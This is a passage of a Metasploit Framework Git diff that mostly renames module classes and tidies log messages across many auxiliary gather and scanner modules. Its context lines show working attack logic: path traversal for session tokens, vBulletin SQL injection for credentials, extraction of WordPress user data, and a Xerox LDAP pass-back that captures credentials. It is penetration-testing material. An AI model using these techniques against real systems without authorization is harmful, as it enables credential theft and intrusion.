etc. By default, the module will return a fake 404, + but you can customize this output by changing the Custom404 datastore option, and + redirect to an external web page. + }, + 'License' => MSF_LICENSE, + 'Author' => [ 'sinn3r' ], + 'DisclosureDate' => "Mar 22 2016", + 'Actions' => + [ + [ + 'WebServer', { + 'Description' => 'A web that collects information about the browser.' + }] + ], + 'PassiveActions' => [ 'WebServer' ], + 'DefaultAction' => 'WebServer' + )) + end + + def is_key_wanted?(key) + ![:module, :created_at, :tried, :vuln_test, :address].include?(key) + end + + def is_value_wanted?(value) + !(value.nil? || value =~ /^undefined|false/ || !value) + end + + def ignore_items!(target_info) + target_info.delete_if do |key, value| + !is_key_wanted?(key) || !is_value_wanted?(value) + end + end + + def report_host_info(target_info) + opts = { host: target_info[:address] } + opts.merge!(target_info) + report_host(opts) + end + + def translate_script_meaning(value) + case value + when 'script' + 'Browser allows JavaScript' + when 'headers' + 'Browser does not allow JavaScript' + end + end + + def print_target_info(cli, target_info) + print_status("#{cli.peerhost} - We have found the following interesting information:") + report_host_info(target_info) + ignore_items!(target_info) + target_info.each_pair do |key, value| + if key == :source + value = translate_script_meaning(value) + end + print_status("#{cli.peerhost} - #{key} = #{value}") + end + end + + def on_request_exploit(cli, req, target_info) + print_target_info(cli, target_info) + send_not_found(cli) + end + + def run + exploit + end + +end diff --git a/modules/auxiliary/gather/checkpoint_hostname.rb b/modules/auxiliary/gather/checkpoint_hostname.rb index b185233021..84d4cf9800 100644 --- a/modules/auxiliary/gather/checkpoint_hostname.rb +++ b/modules/auxiliary/gather/checkpoint_hostname.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Report diff --git a/modules/auxiliary/gather/chromecast_wifi.rb b/modules/auxiliary/gather/chromecast_wifi.rb index 5b0c218f6d..9cb0676df5 100644 --- a/modules/auxiliary/gather/chromecast_wifi.rb +++ b/modules/auxiliary/gather/chromecast_wifi.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit4 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient diff --git a/modules/auxiliary/gather/citrix_published_applications.rb b/modules/auxiliary/gather/citrix_published_applications.rb index ade049c58b..8754bd5bab 100644 --- a/modules/auxiliary/gather/citrix_published_applications.rb +++ b/modules/auxiliary/gather/citrix_published_applications.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Udp diff --git a/modules/auxiliary/gather/citrix_published_bruteforce.rb b/modules/auxiliary/gather/citrix_published_bruteforce.rb index 8160691034..b04997750e 100644 --- a/modules/auxiliary/gather/citrix_published_bruteforce.rb +++ b/modules/auxiliary/gather/citrix_published_bruteforce.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Udp diff --git a/modules/auxiliary/gather/coldfusion_pwd_props.rb b/modules/auxiliary/gather/coldfusion_pwd_props.rb index 0dd09d79aa..ba70df4668 100644 --- a/modules/auxiliary/gather/coldfusion_pwd_props.rb +++ b/modules/auxiliary/gather/coldfusion_pwd_props.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Exploit::Remote::HttpClient @@ -203,7 +203,7 @@ class Metasploit3 < Msf::Auxiliary }) if res.nil? - print_error("#{peer} - Unable to receive a response") + print_error("Unable to receive a response") return end @@ -213,15 +213,15 @@ class Metasploit3 < Msf::Auxiliary if rdspass.empty? and password.empty? # No pass collected, no point to store anything - print_error("#{peer} - No passwords found") + print_error("No passwords found") return end - print_good("#{peer} - rdspassword = #{rdspass}") - print_good("#{peer} - password = #{password}") - print_good("#{peer} - encrypted = #{encrypted}") + print_good("rdspassword = #{rdspass}") + print_good("password = #{password}") + print_good("encrypted = #{encrypted}") p = store_loot('coldfusion.password.properties', 'text/plain', rhost, res.body) - print_good("#{peer} - password.properties stored in '#{p}'") + print_good("password.properties stored in '#{p}'") end end diff --git a/modules/auxiliary/gather/corpwatch_lookup_id.rb b/modules/auxiliary/gather/corpwatch_lookup_id.rb index e6ca939df3..30cf6a6c26 100644 --- a/modules/auxiliary/gather/corpwatch_lookup_id.rb +++ b/modules/auxiliary/gather/corpwatch_lookup_id.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rexml/document' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient diff --git a/modules/auxiliary/gather/corpwatch_lookup_name.rb b/modules/auxiliary/gather/corpwatch_lookup_name.rb index cf83fbecc9..6ca6ae70c6 100644 --- a/modules/auxiliary/gather/corpwatch_lookup_name.rb +++ b/modules/auxiliary/gather/corpwatch_lookup_name.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'rexml/document' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Exploit::Remote::HttpClient diff --git a/modules/auxiliary/gather/d20pass.rb b/modules/auxiliary/gather/d20pass.rb index de42cb7159..cb1313bec2 100644 --- a/modules/auxiliary/gather/d20pass.rb +++ b/modules/auxiliary/gather/d20pass.rb @@ -12,7 +12,7 @@ require 'msf/core' require 'rex/ui/text/shell' require 'rex/proto/tftp' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Rex::Ui::Text include Rex::Proto::TFTP include Msf::Exploit::Remote::Udp diff --git a/modules/auxiliary/gather/dns_bruteforce.rb b/modules/auxiliary/gather/dns_bruteforce.rb index c87615aa62..d501492d94 100644 --- a/modules/auxiliary/gather/dns_bruteforce.rb +++ b/modules/auxiliary/gather/dns_bruteforce.rb @@ -7,7 +7,7 @@ require 'msf/core' require "net/dns/resolver" require 'rex' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::Report def initialize(info = {}) diff --git a/modules/auxiliary/gather/dns_cache_scraper.rb b/modules/auxiliary/gather/dns_cache_scraper.rb index 3b4794fa3f..b32849874c 100644 --- a/modules/auxiliary/gather/dns_cache_scraper.rb +++ b/modules/auxiliary/gather/dns_cache_scraper.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'net/dns/resolver' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::Report def initialize(info = {}) diff --git a/modules/auxiliary/gather/dns_info.rb b/modules/auxiliary/gather/dns_info.rb index 0834c5c16e..2a1d0aebd0 100644 --- a/modules/auxiliary/gather/dns_info.rb +++ b/modules/auxiliary/gather/dns_info.rb @@ -7,7 +7,7 @@ require 'msf/core' require "net/dns/resolver" require 'rex' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::Report def initialize(info = {}) diff --git a/modules/auxiliary/gather/dns_reverse_lookup.rb b/modules/auxiliary/gather/dns_reverse_lookup.rb index 4726b53de9..cb960ba1d8 100644 --- a/modules/auxiliary/gather/dns_reverse_lookup.rb +++ b/modules/auxiliary/gather/dns_reverse_lookup.rb @@ -7,7 +7,7 @@ require 'msf/core' require "net/dns/resolver" require 'rex' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::Report def initialize(info = {}) diff --git a/modules/auxiliary/gather/dns_srv_enum.rb b/modules/auxiliary/gather/dns_srv_enum.rb index 31866fb56a..0bf36e086f 100644 --- a/modules/auxiliary/gather/dns_srv_enum.rb +++ b/modules/auxiliary/gather/dns_srv_enum.rb @@ -7,7 +7,7 @@ require 'msf/core' require "net/dns/resolver" require 'rex' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::Report def initialize(info = {}) diff --git a/modules/auxiliary/gather/doliwamp_traversal_creds.rb b/modules/auxiliary/gather/doliwamp_traversal_creds.rb index ac02e16386..93c6c5367b 100644 --- a/modules/auxiliary/gather/doliwamp_traversal_creds.rb +++ b/modules/auxiliary/gather/doliwamp_traversal_creds.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Exploit::Remote::HttpClient @@ -42,7 +42,7 @@ class Metasploit3 < Msf::Auxiliary # def get_session_tokens tokens = nil - print_status("#{peer} - Finding session tokens...") + print_status("Finding session tokens...") res = send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri( @@ -52,15 +52,15 @@ class Metasploit3 < Msf::Auxiliary 'vars_post' => { 'dir' => datastore['TRAVERSAL_PATH'] } }) if !res - print_error("#{peer} - Connection failed") + print_error("Connection failed") elsif res.code == 404 - print_error("#{peer} - Could not find 'jqueryFileTree.php'") + print_error("Could not find 'jqueryFileTree.php'") elsif res.code == 200 and res.body =~ />sess_([a-z0-9]+)sess_([a-z0-9]+) 'GET', 'uri' => normalize_uri(target_uri.path, 'user/fiche.php'), @@ -80,7 +80,7 @@ class Metasploit3 < Msf::Auxiliary }.to_a.shuffle] }) if !res - print_error("#{peer} - Connection failed") + print_error("Connection failed") elsif res.body =~ /User card/ record = [ res.body.scan(/name="login" value="([^"]+)"/ ).flatten.first, @@ -89,11 +89,11 @@ class Metasploit3 < Msf::Auxiliary res.body.scan(/name="email" class="flat" value="([^"]+)"/).flatten.first ] unless record.empty? - print_good("#{peer} - Found credentials (#{record[0]}:#{record[1]})") + print_good("Found credentials (#{record[0]}:#{record[1]})") return record end else - print_warning("#{peer} - Could not retrieve user credentials") + print_warning("Could not retrieve user credentials") end end @@ -106,13 +106,13 @@ class Metasploit3 < Msf::Auxiliary 'cookie' => @cookie }) if !res - print_error("#{peer} - Connection failed") + print_error("Connection failed") elsif res.body =~ /
    • }).flatten + vprint_good("#{peer} - Found #{hives.length} registry hives (#{hives.join(', ')})") + else + fail_with(Failure::UnexpectedReply, "#{peer} - Unexpected reply (#{res.body.length} bytes)") + end + hives + end + + # + # Retrieve all registry hives + # + def dump_all + hives = retrieve_hive_list + if hives.blank? + print_error("#{peer} - Found no registry hives") + return + end + hives.each { |hive| dump_key(hive) } + end +end diff --git a/modules/auxiliary/gather/solarwinds_orion_sqli.rb b/modules/auxiliary/gather/solarwinds_orion_sqli.rb index 50ea93d350..9565fda3c8 100644 --- a/modules/auxiliary/gather/solarwinds_orion_sqli.rb +++ b/modules/auxiliary/gather/solarwinds_orion_sqli.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient diff --git a/modules/auxiliary/gather/ssllabs_scan.rb b/modules/auxiliary/gather/ssllabs_scan.rb index 316dd0886a..bbe30918cd 100644 --- a/modules/auxiliary/gather/ssllabs_scan.rb +++ b/modules/auxiliary/gather/ssllabs_scan.rb @@ -8,7 +8,7 @@ require 'active_support/inflector' require 'json' require 'active_support/core_ext/hash' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary class InvocationError < StandardError; end class RequestRateTooHigh < StandardError; end class InternalError < StandardError; end @@ -31,7 +31,7 @@ class Metasploit3 < Msf::Auxiliary name = name.to_s.camelize(:lower) uri = api_path + name - cli = Rex::Proto::Http::Client.new(api_host, api_port, {}, true, 'TLS1') + cli = Rex::Proto::Http::Client.new(api_host, api_port, {}, true, 'TLS') cli.connect req = cli.request_cgi({ 'uri' => uri, @@ -430,16 +430,15 @@ class Metasploit3 < Msf::Auxiliary { 'RPORT' => 443, 'SSL' => true, - 'SSLVersion' => 'TLS1' } )) register_options( [ OptString.new('HOSTNAME', [true, 'The target hostname']), OptInt.new('DELAY', [true, 'The delay in seconds between API requests', 5]), - OptBool.new('USECACHE', [true, 'Use cached results (if available), else force live scan', 'true']), - OptBool.new('GRADE', [true, 'Output only the hostname: grade', 'false']), - OptBool.new('IGNOREMISMATCH', [true, 'Proceed with assessments even when the server certificate doesn\'t match the assessment hostname', 'true']) + OptBool.new('USECACHE', [true, 'Use cached results (if available), else force live scan', true]), + OptBool.new('GRADE', [true, 'Output only the hostname: grade', false]), + OptBool.new('IGNOREMISMATCH', [true, 'Proceed with assessments even when the server certificate doesn\'t match the assessment hostname', true]) ], self.class) end diff --git a/modules/auxiliary/gather/trackit_sql_domain_creds.rb b/modules/auxiliary/gather/trackit_sql_domain_creds.rb index 68b1c93e02..79c7d70947 100644 --- a/modules/auxiliary/gather/trackit_sql_domain_creds.rb +++ b/modules/auxiliary/gather/trackit_sql_domain_creds.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'openssl' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Report diff --git a/modules/auxiliary/gather/vbulletin_vote_sqli.rb b/modules/auxiliary/gather/vbulletin_vote_sqli.rb index dbc12f74fc..35aab65f56 100644 --- a/modules/auxiliary/gather/vbulletin_vote_sqli.rb +++ b/modules/auxiliary/gather/vbulletin_vote_sqli.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Exploit::Remote::HttpClient @@ -62,7 +62,7 @@ class Metasploit3 < Msf::Auxiliary max = datastore["MAXNODE"] if min > max - print_error("#{peer} - MINNODE can't be major than MAXNODE") + print_error("MINNODE can't be major than MAXNODE") return nil end @@ -77,11 +77,11 @@ class Metasploit3 < Msf::Auxiliary def get_node if datastore['NODE'].nil? or datastore['NODE'] <= 0 - print_status("#{peer} - Brute forcing to find a valid node id...") + print_status("Brute forcing to find a valid node id...") return brute_force_node end - print_status("#{peer} - Checking node id #{datastore['NODE']}...") + print_status("Checking node id #{datastore['NODE']}...") if exists_node?(datastore['NODE']) return datastore['NODE'] else @@ -173,21 +173,21 @@ class Metasploit3 < Msf::Auxiliary end def run - print_status("#{peer} - Checking for a valid node id...") + print_status("Checking for a valid node id...") node_id = get_node if node_id.nil? - print_error("#{peer} - node id not found") + print_error("node id not found") return end - print_good("#{peer} - Using node id #{node_id} to exploit sqli... Counting users...") + print_good("Using node id #{node_id} to exploit sqli... Counting users...") data = do_sqli(node_id, "select count(*) from user") if data.blank? - print_error("#{peer} - Error exploiting sqli") + print_error("Error exploiting sqli") return end count_users = data.to_i - print_good("#{peer} - #{count_users} users found. Collecting credentials...") + print_good("#{count_users} users found. Collecting credentials...") users_table = Rex::Ui::Text::Table.new( 'Header' => 'vBulletin Users', diff --git a/modules/auxiliary/gather/windows_deployment_services_shares.rb b/modules/auxiliary/gather/windows_deployment_services_shares.rb index c88ab1fc3f..b7777b64c9 100644 --- a/modules/auxiliary/gather/windows_deployment_services_shares.rb +++ b/modules/auxiliary/gather/windows_deployment_services_shares.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'rex/proto/dcerpc' require 'rex/parser/unattend' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::SMB::Client include Msf::Exploit::Remote::SMB::Client::Authenticated diff --git a/modules/auxiliary/gather/wp_all_in_one_migration_export.rb b/modules/auxiliary/gather/wp_all_in_one_migration_export.rb index b06dd773c8..c373f7da95 100644 --- a/modules/auxiliary/gather/wp_all_in_one_migration_export.rb +++ b/modules/auxiliary/gather/wp_all_in_one_migration_export.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HTTP::Wordpress include Msf::Auxiliary::Report @@ -42,7 +42,7 @@ class Metasploit3 < Msf::Auxiliary end def run - print_status("#{peer} - Requesting website export...") + print_status("Requesting website export...") res = send_request_cgi( { 'method' => 'POST', @@ -65,7 +65,7 @@ class Metasploit3 < Msf::Auxiliary print_status("it does not allow WRITE permission to the all-in-one-wp-migration/storage directory.") else store_path = store_loot('wordpress.export', 'zip', datastore['RHOST'], res.body, 'wordpress_backup.zip', 'WordPress Database and Content Backup') - print_good("#{peer} - Backup archive saved to #{store_path}") + print_good("Backup archive saved to #{store_path}") end end end diff --git a/modules/auxiliary/gather/wp_ultimate_csv_importer_user_extract.rb b/modules/auxiliary/gather/wp_ultimate_csv_importer_user_extract.rb index ebdc2ed1a7..6531db1dc8 100644 --- a/modules/auxiliary/gather/wp_ultimate_csv_importer_user_extract.rb +++ b/modules/auxiliary/gather/wp_ultimate_csv_importer_user_extract.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'csv' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HTTP::Wordpress include Msf::Auxiliary::Report @@ -49,7 +49,7 @@ class Metasploit3 < Msf::Auxiliary def process_row(row) if row[:user_login] && row[:user_pass] - print_good("#{peer} - Found credential: #{row[:user_login]}:#{row[:user_pass]}") + print_good("Found credential: #{row[:user_login]}:#{row[:user_pass]}") credential_data = { origin_type: :service, @@ -88,7 +88,7 @@ class Metasploit3 < Msf::Auxiliary end def run - print_status("#{peer} - Requesting CSV extract...") + print_status("Requesting CSV extract...") res = send_request_cgi( 'method' => 'POST', 'uri' => exporter_url, @@ -97,7 +97,7 @@ class Metasploit3 < Msf::Auxiliary fail_with(Failure::Unreachable, 'No response from the target') if res.nil? fail_with(Failure::UnexpectedReply, "Server responded with status code #{res.code}") if res.code != 200 - print_status("#{peer} - Parsing response...") + print_status("Parsing response...") unless parse_csv(res.body, ',') unless parse_csv(res.body, ';') fail_with(Failure::UnexpectedReply, "#{peer} - Failed to parse response, the CSV was invalid") @@ -105,6 +105,6 @@ class Metasploit3 < Msf::Auxiliary end store_path = store_loot('wordpress.users.export', 'csv', datastore['RHOST'], res.body, 'users_export.csv', 'WordPress User Table Extract') - print_good("#{peer} - CSV saved to #{store_path}") + print_good("CSV saved to #{store_path}") end end diff --git a/modules/auxiliary/gather/wp_w3_total_cache_hash_extract.rb b/modules/auxiliary/gather/wp_w3_total_cache_hash_extract.rb index 2dcc988ec3..b5de7b700e 100644 --- a/modules/auxiliary/gather/wp_w3_total_cache_hash_extract.rb +++ b/modules/auxiliary/gather/wp_w3_total_cache_hash_extract.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HTTP::Wordpress include Msf::Auxiliary::Report include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/gather/xbmc_traversal.rb b/modules/auxiliary/gather/xbmc_traversal.rb index 20191221bd..a71c72732d 100644 --- a/modules/auxiliary/gather/xbmc_traversal.rb +++ b/modules/auxiliary/gather/xbmc_traversal.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Exploit::Remote::HttpClient diff --git a/modules/auxiliary/gather/xerox_pwd_extract.rb b/modules/auxiliary/gather/xerox_pwd_extract.rb index 36920371f8..37bbb39e81 100644 --- a/modules/auxiliary/gather/xerox_pwd_extract.rb +++ b/modules/auxiliary/gather/xerox_pwd_extract.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Report diff --git a/modules/auxiliary/gather/xerox_workcentre_5xxx_ldap.rb b/modules/auxiliary/gather/xerox_workcentre_5xxx_ldap.rb index 7de04d2db7..0dc5277b72 100644 --- a/modules/auxiliary/gather/xerox_workcentre_5xxx_ldap.rb +++ b/modules/auxiliary/gather/xerox_workcentre_5xxx_ldap.rb @@ -6,7 +6,7 @@ require 'rex/proto/http' require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Exploit::Remote::TcpServer include Msf::Auxiliary::Report @@ -37,11 +37,11 @@ class Metasploit3 < Msf::Auxiliary end def run - print_status("#{peer} - Attempting to extract LDAP username and password...") + print_status("Attempting to extract LDAP username and password...") @auth_cookie = default_page if @auth_cookie.blank? - print_status("#{peer} - Unable to get authentication cookie from #{rhost}") + print_status("Unable to get authentication cookie from #{rhost}") return end @@ -56,10 +56,10 @@ class Metasploit3 < Msf::Auxiliary start_listener unless @data - print_error("#{peer} - Failed to start listiner or the printer did not send us the creds. :(") + print_error("Failed to start listiner or the printer did not send us the creds. :(") status = restore_ldap_server unless status - print_error("#{peer} - Failed to restore old LDAP server. Please manually restore") + print_error("Failed to restore old LDAP server. Please manually restore") end return end @@ -71,13 +71,13 @@ class Metasploit3 < Msf::Auxiliary ldap_creds = "#{ldap_binary_creds[0]}:#{ldap_binary_creds[1]}" # Woot we got creds so lets save them.# - print_good("#{peer} - The following creds were capured: #{ldap_creds}") + print_good("The following creds were capured: #{ldap_creds}") loot_name = 'ldap.cp.creds' loot_type = 'text/plain' loot_filename = 'ldap-creds.text' loot_desc = 'LDAP Pass-back Harvester' p = store_loot(loot_name, loot_type, datastore['RHOST'], @data, loot_filename, loot_desc) - print_status("#{peer} - Credentials saved in: #{p}") + print_status("Credentials saved in: #{p}") register_creds('ldap', rhost, @ldap_port, ldap_binary_creds[0], ldap_binary_creds[1]) end @@ -87,7 +87,7 @@ class Metasploit3 < Msf::Auxiliary method = 'GET' res = make_request(page, method, '') if res.blank? || res.code != 200 - print_error("#{peer} - Failed to connect to #{rhost}. Please check the printers IP address.") + print_error("Failed to connect to #{rhost}. Please check the printers IP address.") return '' end res.get_cookies @@ -109,7 +109,7 @@ class Metasploit3 < Msf::Auxiliary res = make_request(login_page, method, login_post_data) if res.blank? || res.code != 200 - print_error("#{peer} - Failed to login. Please check the password for the Administrator account") + print_error("Failed to login. Please check the password for the Administrator account") return nil end res.code @@ -126,9 +126,9 @@ class Metasploit3 < Msf::Auxiliary ldap_port_number = ldap_port_settings.scan(/valPrt_1\[2\] = (\d+)/).flatten @ldap_server = "#{ldap_server_ip[0]}.#{ldap_server_ip[1]}.#{ldap_server_ip[2]}.#{ldap_server_ip[3]}" @ldap_port = ldap_port_number[0] - print_status("#{peer} - LDAP server: #{@ldap_server}") + print_status("LDAP server: #{@ldap_server}") unless res.code == 200 || res.blank? - print_error("#{peer} - Failed to get LDAP data.") + print_error("Failed to get LDAP data.") return nil end res.code @@ -149,10 +149,10 @@ class Metasploit3 < Msf::Auxiliary ldap_update_post *= '&' method = 'POST' - print_status("#{peer} - Updating LDAP server: #{datastore['NewLDAPServer']} and port: #{datastore['SRVPORT']}") + print_status("Updating LDAP server: #{datastore['NewLDAPServer']} and port: #{datastore['SRVPORT']}") res = make_request(ldap_update_page, method, ldap_update_post) if res.blank? || res.code != 200 - print_error("#{peer} - Failed to update LDAP server. Please check the host: #{rhost}") + print_error("Failed to update LDAP server. Please check the host: #{rhost}") return nil end res.code @@ -184,7 +184,7 @@ class Metasploit3 < Msf::Auxiliary ldap_trigger_post *= '&' method = 'POST' - print_status("#{peer} - Triggering LDAP reqeust") + print_status("Triggering LDAP reqeust") res = make_request(ldap_trigger_page, method, ldap_trigger_post) res.code end @@ -243,10 +243,10 @@ class Metasploit3 < Msf::Auxiliary ldap_restore_post *= '&' method = 'POST' - print_status("#{peer} - Restoring LDAP server: #{@ldap_server}") + print_status("Restoring LDAP server: #{@ldap_server}") res = make_request(ldap_restore_page, method, ldap_restore_post) if res.blank? || res.code != 200 - print_error("#{peer} - Failed to restore LDAP server: #{@ldap_server}. Please fix manually") + print_error("Failed to restore LDAP server: #{@ldap_server}. Please fix manually") return nil end res.code @@ -265,7 +265,7 @@ class Metasploit3 < Msf::Auxiliary }, datastore['TIMEOUT'].to_i) rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Rex::ConnectionError - print_error("#{peer} - Connection failed.") + print_error("Connection failed.") end res diff --git a/modules/auxiliary/parser/unattend.rb b/modules/auxiliary/parser/unattend.rb index 7ad4e310cd..b799364b31 100644 --- a/modules/auxiliary/parser/unattend.rb +++ b/modules/auxiliary/parser/unattend.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex/parser/unattend' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary def initialize(info={}) super( update_info( info, diff --git a/modules/auxiliary/pdf/foxit/authbypass.rb b/modules/auxiliary/pdf/foxit/authbypass.rb index 438a3ecaee..bcf0040fa6 100644 --- a/modules/auxiliary/pdf/foxit/authbypass.rb +++ b/modules/auxiliary/pdf/foxit/authbypass.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'zlib' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::FILEFORMAT diff --git a/modules/auxiliary/scanner/acpp/login.rb b/modules/auxiliary/scanner/acpp/login.rb index 10047d1b06..ea91ad047d 100644 --- a/modules/auxiliary/scanner/acpp/login.rb +++ b/modules/auxiliary/scanner/acpp/login.rb @@ -8,7 +8,7 @@ require 'rex/proto/acpp' require 'metasploit/framework/credential_collection' require 'metasploit/framework/login_scanner/acpp' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Scanner include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/afp/afp_login.rb b/modules/auxiliary/scanner/afp/afp_login.rb index 74aa22c26a..79ff59603a 100644 --- a/modules/auxiliary/scanner/afp/afp_login.rb +++ b/modules/auxiliary/scanner/afp/afp_login.rb @@ -8,7 +8,7 @@ require 'openssl' require 'metasploit/framework/credential_collection' require 'metasploit/framework/login_scanner/afp' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/afp/afp_server_info.rb b/modules/auxiliary/scanner/afp/afp_server_info.rb index 5a7c4edc0c..b8de8c4b40 100644 --- a/modules/auxiliary/scanner/afp/afp_server_info.rb +++ b/modules/auxiliary/scanner/afp/afp_server_info.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/backdoor/energizer_duo_detect.rb b/modules/auxiliary/scanner/backdoor/energizer_duo_detect.rb index d48bc8a561..c2925cb87d 100644 --- a/modules/auxiliary/scanner/backdoor/energizer_duo_detect.rb +++ b/modules/auxiliary/scanner/backdoor/energizer_duo_detect.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/chargen/chargen_probe.rb b/modules/auxiliary/scanner/chargen/chargen_probe.rb index fe43a0e3e5..3dc4381ead 100644 --- a/modules/auxiliary/scanner/chargen/chargen_probe.rb +++ b/modules/auxiliary/scanner/chargen/chargen_probe.rb @@ -6,7 +6,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::Scanner include Msf::Exploit::Capture diff --git a/modules/auxiliary/scanner/couchdb/couchdb_enum.rb b/modules/auxiliary/scanner/couchdb/couchdb_enum.rb index 9e36f7fd21..8a00c5aa99 100644 --- a/modules/auxiliary/scanner/couchdb/couchdb_enum.rb +++ b/modules/auxiliary/scanner/couchdb/couchdb_enum.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report @@ -47,7 +47,7 @@ class Metasploit3 < Msf::Auxiliary temp = JSON.parse(res.body) rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, JSON::ParserError => e - print_error("#{peer} - The following Error was encountered: #{e.class}") + print_error("The following Error was encountered: #{e.class}") return end @@ -64,9 +64,9 @@ class Metasploit3 < Msf::Auxiliary 'CouchDB Enum' ) - print_good("#{peer} - File saved in: #{path}") + print_good("File saved in: #{path}") else - print_error("#{peer} - Unable to enum, received \"#{res.code}\"") + print_error("Unable to enum, received \"#{res.code}\"") end end end diff --git a/modules/auxiliary/scanner/couchdb/couchdb_login.rb b/modules/auxiliary/scanner/couchdb/couchdb_login.rb index 5782874ac1..9cad284af0 100644 --- a/modules/auxiliary/scanner/couchdb/couchdb_login.rb +++ b/modules/auxiliary/scanner/couchdb/couchdb_login.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/db2/db2_auth.rb b/modules/auxiliary/scanner/db2/db2_auth.rb index b5afbe1bab..01a50ca23e 100644 --- a/modules/auxiliary/scanner/db2/db2_auth.rb +++ b/modules/auxiliary/scanner/db2/db2_auth.rb @@ -8,7 +8,7 @@ require 'msf/core' require 'metasploit/framework/credential_collection' require 'metasploit/framework/login_scanner/db2' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::DB2 include Msf::Auxiliary::AuthBrute diff --git a/modules/auxiliary/scanner/db2/db2_version.rb b/modules/auxiliary/scanner/db2/db2_version.rb index 3feac07d07..3344d38509 100644 --- a/modules/auxiliary/scanner/db2/db2_version.rb +++ b/modules/auxiliary/scanner/db2/db2_version.rb @@ 